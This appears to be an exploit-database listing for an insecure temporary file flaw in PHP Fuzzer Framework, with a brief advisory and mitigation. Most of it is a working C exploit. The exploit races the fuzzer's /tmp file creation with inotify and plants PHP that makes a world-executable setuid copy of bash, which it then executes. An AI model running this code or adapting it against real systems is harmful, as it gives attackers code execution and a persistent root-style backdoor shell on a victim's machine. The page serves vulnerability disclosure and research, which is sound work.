header-logo
Suggest Exploit
vendor:
PHP Fuzzer Framework
by:
SecurityFocus
7.2
CVSS
HIGH
Insecure File Creation
377
CWE
Product Name: PHP Fuzzer Framework
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

PHP Fuzzer Framework creates temporary files in an insecure manner

An attacker with local access could potentially exploit this issue to overwrite and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.

Mitigation:

Ensure that temporary files are created securely and with the appropriate permissions.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/35924/info

PHP Fuzzer Framework creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to overwrite and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.

#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)


int main(int argc, char *argv[])
{
    int f,n,w;
    char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
    struct inotify_event e;
    n = inotify_init();
    printf("-=*************-\n");
    if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
        write(f, s, strlen(s));
        close(f);
    }
    printf("[+] created abritrary code: %s\n",  FILEB);
    w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
    read(n, &e, sizeof(e));
    rename(FILEB, FILEA);
    printf("[+] %s => %s\n", FILEB, FILEA);
        printf("[+] executing arbitrary code\n");
    sleep(2);
    printf("[+] racism complete \n");
    execl("/tmp/sh", "/tmp/sh", 0);

}